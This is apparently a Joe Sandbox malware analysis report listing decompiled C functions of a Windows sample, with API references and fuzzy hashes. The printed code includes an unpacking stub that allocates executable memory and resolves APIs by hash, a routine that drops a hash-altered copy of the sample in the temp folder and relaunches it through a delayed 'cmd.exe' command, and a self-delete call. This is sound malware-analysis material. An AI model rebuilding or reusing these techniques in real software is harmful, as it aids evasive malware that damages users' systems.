			E004B5DAE(intOrPtr _a32, char _a846, intOrPtr _a2801, intOrPtr _a2805, intOrPtr _a2809, intOrPtr _a2813, intOrPtr _a2817, intOrPtr _a2821, void* _a6897, void* _a6921, intOrPtr _a6929, intOrPtr _a6965, intOrPtr _a6977, char _a6981, char _a6992, char _a7034, char _a7074, char _a7131, intOrPtr _a8349, char _a8369, intOrPtr _a8546, intOrPtr _a9058, intOrPtr _a9791, signed int* _a9795, void* _a9799, char _a9803) {
				CHAR* _v16;
				intOrPtr* _v24;
				struct _STARTUPINFOA _v96;
				char _v100;
				char _v104;
				int _v108;
				char _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t96;
				void* _t100;
				signed int* _t102;
				void* _t104;
				intOrPtr _t107;
				void* _t109;
				void* _t112;
				signed int* _t118;
				signed int _t120;
				void* _t121;
				char* _t122;
				signed int _t123;
				void* _t126;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				char _t138;
				intOrPtr* _t144;
				intOrPtr _t145;
				signed int _t147;
				int _t149;
				intOrPtr* _t150;
				intOrPtr _t151;
				void* _t155;
				intOrPtr* _t156;
				intOrPtr* _t157;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t168;
				CHAR* _t175;
				signed int _t176;
				void* _t177;
				void* _t178;
				void* _t179;
				char* _t180;
				intOrPtr* _t181;
				intOrPtr* _t182;
				void* _t183;
				signed int* _t185;
				intOrPtr* _t186;
				intOrPtr _t188;
				intOrPtr* _t190;
				intOrPtr _t191;
				intOrPtr _t204;

				_t188 =  *_t190;
				_t191 = _t190 + 4;
				_t180 =  &_a9803;
				_t156 =  &_a846;
				_t175 = 0;
				E004B6059(0, _t180);
				_a6897 = VirtualAlloc(0, 0xc2000, 0x1000, 0x40);
				while( *((intOrPtr*)(_t175 + _t180)) != 0) {
					asm("pushad");
					_t96 =  *_t156( *((intOrPtr*)(_t175 + _t180 + 4)),  *((intOrPtr*)(_t175 + _t180)), _a6897);
					asm("popad");
					_t175 = _t175 + 8;
				}
				_t31 = _t180 + 4; // 0x4
				_t181 = _t175 + _t31;
				if(_a9058 != 1) {
					_t182 = _t181 + 8;
				} else {
					_t179 = 0;
					asm("pushad");
					while(1) {
						_t179 = _t179;
						if(_t179 != 0) {
							break;
						}
						_t156 =  *((intOrPtr*)(_t181 + 4));
						_t155 = E004B6041( *_t181, _t156);
						_push( &_a8369);
						if( *((intOrPtr*)(_t181 + 8)) != 0) {
							_push(0x40);
						} else {
							_push(0x20);
						}
						_t96 = _a2817(_t156, _t155);
						_t181 = _t181 + 0xc;
						if( *_t181 == 0xffffffff) {
							_t179 = _t179 + 1;
						}
					}
					_a32 = _t181 + 4;
					asm("popad");
					_t182 = _t96;
				}
				_a6929 =  *_t182;
				_t183 = _t182 + 4;
				E004B77E1(_t183);
				_a9799 = VirtualAlloc(0, 0xbbc, 0x1000, 0x40);
				_t157 = _t156;
				asm("pushad");
				_t100 =  *_t157(_a9799, _t183 + 4, _a6897);
				asm("popad");
				E004B7114(_t100);
				if(_a8546 != 0 && _a8349 != 0) {
					E004B73CF();
					E004B726C();
				}
				_t185 = _a9799;
				_t102 = _t185;
				while( *_t102 != 1) {
					_t102 =  &(_t102[0]);
				}
				_t176 = _t102[0];
				_t104 = E004B6025( &(_t102[0]), _t176);
				_t105 = _t104 + 4;
				_a9795 = _t104 + 4;
				while( *_t185 != 1) {
					E004B6920(_t105);
					_t107 = _a2821(_t185);
					if(_t107 == 0) {
						_t177 = 0;
						goto L64;
					} else {
						_a9791 = _t107;
						_t118 = _t185;
						L51:
						while( *_t118 != 0) {
							while(1) {
								_t120 =  *_a9795;
								if((_t120 & 0x80000000) == 0) {
									_push(_a9795);
								} else {
									_t123 = _t120 ^ 0x80000000;
									_push(_t123);
									_a6921 = _t123;
									 *_a9795 = 0x202020;
								}
								_t121 = _a2805(_a9791);
								if(_t121 == 0) {
									break;
								}
								_a6921 = 0;
								 *_t176 = _t121;
								_t176 = _t176 + 4;
								_t122 = _a9795;
								while( *_t122 != 0) {
									_t122 = _t122 + 1;
								}
								_t118 = _t122 + 1;
								_a9795 = _t118;
								if(( *_t118 & 0x80000000) != 0) {
									continue;
								} else {
									goto L51;
								}
								goto L75;
							}
							if(_a6921 != 0) {
								_t177 = 2;
							} else {
								_t177 = 1;
							}
							L64:
							_a9799 = _a2809(0, 0x1000, 0x1000, 0x40);
							_t109 = _a2801( &_a6981);
							_push(_t109);
							if(_a6965 == 0xabbc680d) {
								_push(_a6965);
								_push(_t109);
								_a6965 = E004B784E();
							}
							_pop(_t110);
							if(_a6977 == 0xea3af0d7) {
								_push(_a6977);
								_a6977 = E004B784E();
							}
							_t178 = _t177;
							if(_t178 != 0) {
								if(_t178 != 1) {
									if(_t178 == 2) {
										_a6977(_a9799,  &_a7131, _a6921, _t185);
									}
								} else {
									_a6977(_a9799,  &_a7074, _a9795, _t185);
								}
							} else {
								_a6977(_a9799,  &_a7034, _t185);
							}
							_a6965(0, _a9799,  &_a6992, 0x30);
							_t112 = _a2813(_a9799, 0x1000, 0x4000);
							asm("popad");
							return _t112;
							goto L75;
						}
						while( *_t185 != 0) {
							_t185 =  &(_t185[0]);
						}
						_t185 =  &(_t185[0]);
						_t176 = _t118[0];
						_t126 = E004B6025( &(_t118[0]), _t176);
						_t105 = _t126 + 4;
						_a9795 = _t126 + 4;
						continue;
					}
					L75:
				}
				VirtualFree(_a9799, 0xbbc, 0x4000);
				VirtualFree(_a6897, 0xc2000, 0x4000);
				E004B6088();
				asm("popad");
				 *[fs:0x0] = _t191;
				_v96.hStdOutput = _t191 - 0x68;
				_v16 = 0;
				 *0x4172ec(2, _t176, _t185, _t157,  *[fs:0x0], 0x415404, 0x419100, 0xffffffff, _t188);
				 *0x41cbe0 =  *0x41cbe0 | 0xffffffff;
				 *0x41cbe4 =  *0x41cbe4 | 0xffffffff;
				_t132 =  *0x4172f0();
				_t165 =  *0x41c9b8; // 0x0
				 *_t132 = _t165;
				_t133 =  *0x4172f4();
				_t166 =  *0x41c9b4; // 0x0
				 *_t133 = _t166;
				_t134 =  *0x4172fc; // 0x74896be4
				 *0x41cbdc =  *_t134;
				_t136 = E0041559B( *_t134);
				_t204 =  *0x41c8c8; // 0x1
				if(_t204 == 0) {
					_t136 =  *0x4172e4(E00415598);
				}
				E00415586(_t136);
				L00415580();
				_t138 =  *0x41c9b0; // 0x0
				_v112 = _t138;
				 *0x4172dc( &_v100,  &_v116,  &_v104,  *0x41c9ac,  &_v112, 0x41c028, 0x41c02c);
				_push(0x41c024);
				_push(0x41c000); // executed
				L00415580(); // executed
				_t144 =  *0x4172d8; // 0x74895b9c
				_t186 =  *_t144;
				_v120 = _t186;
				if( *_t186 != 0x22) {
					while( *_t186 > 0x20) {
						_t186 = _t186 + 1;
						_v120 = _t186;
					}
				} else {
					do {
						_t186 = _t186 + 1;
						_v120 = _t186;
						_t151 =  *_t186;
					} while (_t151 != 0 && _t151 != 0x22);
					if( *_t186 == 0x22) {
						L7:
						_t186 = _t186 + 1;
						_v120 = _t186;
					}
				}
				_t145 =  *_t186;
				if(_t145 != 0 && _t145 <= 0x20) {
					goto L7;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t147 = 0xa;
				} else {
					_t147 = _v96.wShowWindow & 0x0000ffff;
				}
				_t149 = E004155C6(GetModuleHandleA(0), _t148, 0, _t186, _t147);
				_v108 = _t149;
				exit(_t149);
				_t150 = _v24;
				_t168 =  *((intOrPtr*)( *_t150));
				_v124 = _t168;
				_push(_t150);
				_push(_t168);
				L0041557A();
				return _t150;
				goto L75;
			}

APIs

VirtualAlloc.KERNELBASE(00000000,000C2000,00001000,00000040), ref: 004B5DE4
VirtualAlloc.KERNELBASE(00000000,00000BBC,00001000,00000040,?), ref: 004B5E87
VirtualFree.KERNELBASE(?,00000BBC,00004000), ref: 004B5FBB
VirtualFree.KERNELBASE(?,000C2000,00004000), ref: 004B5FD1

Memory Dump Source

Source File: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: ab74742cb4fde76f7cddec908db20751c27099f300f7c53e83f3c01ce56dee9b
Instruction ID: 24e4992b9d6948e21e8e4bedf5f1e11d57e5dbc52c2922d56559ceabe911fcce
Opcode Fuzzy Hash: ab74742cb4fde76f7cddec908db20751c27099f300f7c53e83f3c01ce56dee9b
Instruction Fuzzy Hash: 0691E471944689EFEF31AF60CC09BEABB65EF05300F210016F94E5A291D3B95B51DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00401703 Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00401703(void* __ecx) {
				void* _t15;
				void* _t28;
				void* _t30;

				L004153D0();
				_t28 = __ecx;
				_push(0);
				L00415208();
				L00415202();
				if( *((intOrPtr*)( *((intOrPtr*)( *0x417284())) + 4)) == 0) {
					E00401194(); // executed
				}
				_t15 = E004013BC(); // executed
				if(_t15 != 0) {
					ExitProcess(0xffffffff); // executed
				}
				_push(0);
				E00401831(_t30 - 0x90);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((intOrPtr*)(_t28 + 0x20)) = _t30 - 0x90;
				L004151FC();
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				E0040178C(_t30 - 0x90);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return 0;
			}

0x00401708
0x00401714
0x00401716
0x00401718
0x00401720
0x00401731
0x00401733
0x00401733
0x00401738
0x0040173f
0x00401743
0x00401743
0x00401749
0x00401751
0x00401756
0x00401766
0x00401769
0x0040176e
0x00401778
0x00401783
0x0040178b

APIs

_EH_prolog.MSVCRT ref: 00401708
__p___argv.MSVCRT ref: 00401725
ExitProcess.KERNEL32 ref: 00401743

Part of subcall function 00401194: memset.MSVCRT ref: 004011B5
Part of subcall function 00401194: __p___argv.MSVCRT ref: 004011C4
Part of subcall function 00401194: __p___argv.MSVCRT ref: 004011E6
Part of subcall function 00401194: Sleep.KERNEL32(00000064), ref: 004011FB
Part of subcall function 00401194: GetTickCount.KERNEL32 ref: 00401233
Part of subcall function 00401194: GetTempPathA.KERNEL32(00000104,?), ref: 00401263
Part of subcall function 00401194: wsprintfA.USER32 ref: 00401280
Part of subcall function 00401194: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 004012A0
Part of subcall function 00401194: time.MSVCRT ref: 004012AA

Part of subcall function 00401831: _EH_prolog.MSVCRT ref: 00401836
Part of subcall function 00401831: LoadIconA.USER32(00000000,00000080), ref: 004018D8

Part of subcall function 0040178C: _EH_prolog.MSVCRT ref: 00401791

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: H_prolog__p___argv$CountCreateExitFileIconLoadPathProcessSleepTempTickmemsettimewsprintf
String ID:
API String ID: 3574655727-0
Opcode ID: 0ace9a3c71477d23a19550cb91febc7830957eadbbfee540fdc6343e424ed2c1
Instruction ID: d643b5abc61cb50e4851cccbfb1eddeb9cb1e70d3b45357e864f9708fc649bd8
Opcode Fuzzy Hash: 0ace9a3c71477d23a19550cb91febc7830957eadbbfee540fdc6343e424ed2c1
Instruction Fuzzy Hash: 08016D31910514CFDB24FB75C80ABDCB7B4BF44318F4042AEA425A35E2EB789A44CA59

Uniqueness

Uniqueness Score: -1.00%

Function 0040100C Relevance: 3.0, APIs: 2, Instructions: 12
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040100C(intOrPtr* __ecx) {
				intOrPtr* _t7;

				_t7 = __ecx;
				L004151E4();
				 *__ecx = 0x417368;
				DeleteFileA( *( *((intOrPtr*)( *0x417284(0))) + 4)); // executed
				return _t7;
			}

0x0040100d
0x00401011
0x00401016
0x00401027
0x00401030

APIs

__p___argv.MSVCRT ref: 0040101C
DeleteFileA.KERNELBASE(?), ref: 00401027

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: DeleteFile__p___argv
String ID:
API String ID: 2264924877-0
Opcode ID: 453613419905931ceb74943f40faada2a6ce75f82fc200d5faaff9cf141e643d
Instruction ID: fa09fb3c8641d5cc015e2d4a925410924725748b1339da5762470490f22408cc
Opcode Fuzzy Hash: 453613419905931ceb74943f40faada2a6ce75f82fc200d5faaff9cf141e643d
Instruction Fuzzy Hash: 36D0C9306482109FC7416F58EC09BC47AB0FB49311B0180AAF8008B220DBB44840CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00415340 Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_onexit.KERNELBASE ref: 0041534D
__dllonexit.MSVCRT ref: 00415363

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: 0692d2618b5d768e1866788beeb27d60625449e7663a897e878aae36d8e0dfc9
Instruction ID: 98d401c415d6678ea52b1c0f42600251c3288c2a67878add2b384861b0e27a05
Opcode Fuzzy Hash: 0692d2618b5d768e1866788beeb27d60625449e7663a897e878aae36d8e0dfc9
Instruction Fuzzy Hash: 8CC0123168D600FBCA005710BD47ACA3B22A790F76B6482ABF465D40F0D77D7450B90D

Uniqueness

Uniqueness Score: -1.00%

Function 004B7114 Relevance: 1.5, APIs: 1, Instructions: 21
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E004B7114(struct HINSTANCE__* __eax) {
				struct HINSTANCE__* _t4;
				CHAR* _t7;
				void* _t8;

				_t4 = __eax;
				asm("pushad");
				_t7 =  *(_t8 + 0x2647);
				while( *_t7 != 1) {
					_t4 =  *((intOrPtr*)(_t8 + 0xb05))(_t7);
					if(_t4 == 0) {
						_t4 = LoadLibraryA(_t7);
						if(_t4 == 0) {
							_t4 = E004B7148(_t7);
						}
					}
					while( *_t7 != 0) {
						_t7 =  &(_t7[1]);
					}
					_t7 =  &(_t7[1]);
				}
				asm("popad");
				return _t4;
			}

0x004b7114
0x004b7114
0x004b7115
0x004b7141
0x004b7124
0x004b7126
0x004b712f
0x004b7131
0x004b7133
0x004b7133
0x004b7131
0x004b713b
0x004b713a
0x004b713a
0x004b7140
0x004b7140
0x004b7146
0x004b7147

APIs

LoadLibraryA.KERNELBASE(?), ref: 004B7129

Memory Dump Source

Source File: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f7215e5c88bd8584eeeef7b4fe5130b74e6871c6b9ebad737e72971a41f8c06e
Instruction ID: 28aa9155c9c21b83bdb7bcef97a423d10cb3e5a31c1a923e1a5360d2fc2f006b
Opcode Fuzzy Hash: f7215e5c88bd8584eeeef7b4fe5130b74e6871c6b9ebad737e72971a41f8c06e
Instruction Fuzzy Hash: 6EE0122054D5A566DF322F2C48057EA7AD06FA2354F211466E4C6A5701F7AC0D829BFE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401A9F Relevance: 9.1, APIs: 6, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00401A9F(void* __ecx, void* __edx) {
				struct tagRECT _v20;
				signed int _v100;
				void* _v104;
				int _t15;
				int _t20;
				int _t21;
				int _t36;
				void* _t44;
				void* _t49;

				_t44 = __edx;
				_t49 = __ecx;
				_t15 = IsIconic( *(__ecx + 0x20));
				if(_t15 == 0) {
					L0041530A();
					return _t15;
				}
				_push(_t49);
				L00415316();
				asm("sbb eax, eax");
				SendMessageA( *(_t49 + 0x20), 0x27,  ~( &_v104) & _v100, 0);
				_t20 = GetSystemMetrics(0xb);
				_t21 = GetSystemMetrics(0xc);
				GetClientRect( *(_t49 + 0x20),  &_v20);
				asm("cdq");
				asm("cdq");
				_t36 = DrawIcon(_v100, _v20.right - _v20.left - _t20 + 1 - _t44 >> 1, _v20.bottom - _v20.top - _t21 + 1 - _t44 >> 1,  *(_t49 + 0x80));
				L00415310();
				return _t36;
			}

APIs

IsIconic.USER32(?), ref: 00401AAB
SendMessageA.USER32(?,00000027,?,00000000), ref: 00401AD2
GetSystemMetrics.USER32(0000000B), ref: 00401AE0
GetSystemMetrics.USER32(0000000C), ref: 00401AE6
GetClientRect.USER32(?,?), ref: 00401AF1
DrawIcon.USER32(?,?,?,?), ref: 00401B1E

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
String ID:
API String ID: 2166663075-0
Opcode ID: c0666227f9d517d82840dde3631b24f9bc539510c4346564aa02d05e315ece31
Instruction ID: 088e3e68de5ff62e47a0c8f7cb64779c5762a4f9d9f917aba8eef08205d66377
Opcode Fuzzy Hash: c0666227f9d517d82840dde3631b24f9bc539510c4346564aa02d05e315ece31
Instruction Fuzzy Hash: B511517261021DAFCB00ABB8DD49EEEB7B9FB84304F044629F956D70A0DB74E901DB14

Uniqueness

Uniqueness Score: -1.00%

Function 0044AB60 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c792754ec9edb6c26f15a7f47a1957124246a507d0db3e88f47c55cabad0487
Instruction ID: fb82d8e2b907d47e0205e0c15bac6958ef862b02caeeb255dfc9c4c68bb3a339
Opcode Fuzzy Hash: 1c792754ec9edb6c26f15a7f47a1957124246a507d0db3e88f47c55cabad0487
Instruction Fuzzy Hash: 15F03CB5444108FEEF07AF55C6824E97F63FF41341F11850BB9481AA02D33EDA61AB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401194 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 183
sleepfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00401194() {
				long _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				long _v32;
				void* _v47;
				char _v48;
				void _v307;
				char _v308;
				void _v567;
				char _v568;
				void _v827;
				char _v828;
				void _v1851;
				char _v1852;
				void* _t55;
				signed int _t66;
				void* _t77;
				int _t78;
				signed int _t97;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t106;
				signed int _t107;
				signed int _t111;
				void* _t120;
				int _t126;
				void* _t134;
				void* _t136;
				void* _t144;

				L004151F6();
				_t120 = _t55;
				_v20 = _t120;
				memset(_t120, 0, 0x100000);
				_v12 = 0;
				E004010DF(_t106, _t144, _t120,  *((intOrPtr*)( *((intOrPtr*)( *0x417284(0x100000))))),  &_v12);
				_t136 = _t134 + 0x1c;
				_t145 =  *_t120 - 0x4d;
				if( *_t120 == 0x4d) {
					L2:
					_t107 = 0x40;
					_v308 = 0;
					_v48 = 0;
					memset( &_v307, 0, _t107 << 2);
					asm("stosw");
					asm("stosb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					E0040107C( &_v48, 5);
					_t66 = GetTickCount();
					_v8 = _t66 & 0x000001ff;
					_t111 = 0x40;
					_v568 = 0;
					memset( &_v567, 0, _t111 << 2);
					asm("stosw");
					asm("stosb");
					GetTempPathA(0x104,  &_v568);
					wsprintfA( &_v308, "%s\\%s.exe",  &_v568,  &_v48);
					_t77 = CreateFileA( &_v308, 0x40000000, 2, 0, 2, 0x80, 0);
					_v16 = _t77;
					_t78 =  *0x417270(0);
					srand(_t78);
					_push(_v8);
					L004151F6();
					_t126 = _t78;
					_v24 = 0;
					_v28 = _t126;
					if(_v8 <= 0) {
						L4:
						Sleep(0x64);
						WriteFile(_v16, _v20, _v12,  &_v32, 0);
						Sleep(0x64);
						WriteFile(_v16, _v28, _v8,  &_v32, 0);
						CloseHandle(_v16);
						L004151EA();
						L004151EA();
						_v1852 = 0;
						memset( &_v1851, 0, 0xff << 2);
						asm("stosw");
						asm("stosb");
						_v828 = 0;
						memset( &_v827, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						_push( *((intOrPtr*)( *((intOrPtr*)( *0x417284(0x40, _v20, _v28))))));
						_push( &_v828);
						L004153C0();
						wsprintfA( &_v1852, "cmd.exe /c ping 127.0.0.1 -n 2&%s \"%s\"",  &_v308,  &_v828);
						WinExec( &_v1852, 0);
						Sleep(0x1f4);
						ExitProcess(0xffffffff);
					} else {
						goto L3;
					}
					do {
						L3:
						_t97 = rand();
						asm("cdq");
						_t99 = _v24;
						 *((char*)(_t99 + _t126)) = _t97 % 0xff - _t99;
						_t100 = _t99 + 1;
						_v24 = _t100;
					} while (_t100 < _v8);
					goto L4;
				} else {
					goto L1;
				}
				do {
					L1:
					E004010DF(_t106, _t145, _t120,  *((intOrPtr*)( *((intOrPtr*)( *0x417284())))),  &_v12);
					_t136 = _t136 + 0xc;
					Sleep(0x64);
				} while ( *_t120 != 0x4d);
				goto L2;
			}

APIs

memset.MSVCRT ref: 004011B5
__p___argv.MSVCRT ref: 004011C4

Part of subcall function 004010DF: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040111A

__p___argv.MSVCRT ref: 004011E6

Part of subcall function 004010DF: memset.MSVCRT ref: 00401141
Part of subcall function 004010DF: ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401159
Part of subcall function 004010DF: memcpy.MSVCRT ref: 00401174
Part of subcall function 004010DF: CloseHandle.KERNEL32(?), ref: 00401186

Sleep.KERNEL32(00000064), ref: 004011FB
GetTickCount.KERNEL32 ref: 00401233
GetTempPathA.KERNEL32(00000104,?), ref: 00401263
wsprintfA.USER32 ref: 00401280
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 004012A0
time.MSVCRT ref: 004012AA
srand.MSVCRT ref: 004012B1
rand.MSVCRT ref: 004012CF
Sleep.KERNEL32(00000064), ref: 004012F0
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401306
Sleep.KERNEL32(00000064), ref: 0040130A
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040131A
CloseHandle.KERNEL32(?), ref: 0040131F
__p___argv.MSVCRT ref: 00401363
_mbscpy.MSVCRT ref: 00401374
wsprintfA.USER32 ref: 00401393
WinExec.KERNEL32(?,00000000), ref: 004013A4
Sleep.KERNEL32(000001F4), ref: 004013AF
ExitProcess.KERNEL32 ref: 004013B3

Strings

%s\%s.exe, xrefs: 0040127A
cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 0040138D

Memory Dump Source

Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ifaie.jbxd

Similarity

API ID: File$Sleep$__p___argv$CloseCreateHandleWritememsetwsprintf$CountExecExitPathProcessReadTempTick_mbscpymemcpyrandsrandtime
String ID: %s\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
API String ID: 3198981119-2816570591
Opcode ID: 2682df70523cec0996b0936c980b707a910b3e4237ae95f3caab59d1c3965546
Instruction ID: d2297b8266ecacfc823cd110b5f5006d7f60a8736864fb2ea4bbb2a36b220300
Opcode Fuzzy Hash: 2682df70523cec0996b0936c980b707a910b3e4237ae95f3caab59d1c3965546
Instruction Fuzzy Hash: E8515B72D44209BFDB11ABE4CC89ADEBFB9EB48300F1044B6F204E6160DA795B44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00401B41 Relevance: 35.5, APIs: 13, Strings: 7, Instructions: 482
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00401B41(void* __ecx, void* __edx, long long __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t229;
				char* _t247;
				signed int _t253;
				intOrPtr* _t256;
				char* _t258;
				signed int _t261;
				char* _t285;
				signed int _t292;
				char* _t303;
				void* _t304;
				signed int _t310;
				signed int _t312;
				char* _t317;
				void* _t320;
				void* _t335;
				void* _t342;
				void* _t365;
				signed int _t380;
				void* _t382;
				signed int _t389;
				intOrPtr* _t401;
				char* _t402;
				char* _t403;
				char* _t404;
				void* _t405;
				signed int _t410;
				intOrPtr* _t414;
				char* _t415;
				void* _t418;
				void* _t420;
				long long* _t421;
				long long* _t424;
				void* _t426;
				long long* _t427;
				long long _t430;

				_t430 = __fp0;
				L004153D0();
				_t421 = _t420 - 0x18c;
				_t229 =  *(_t418 + 8);
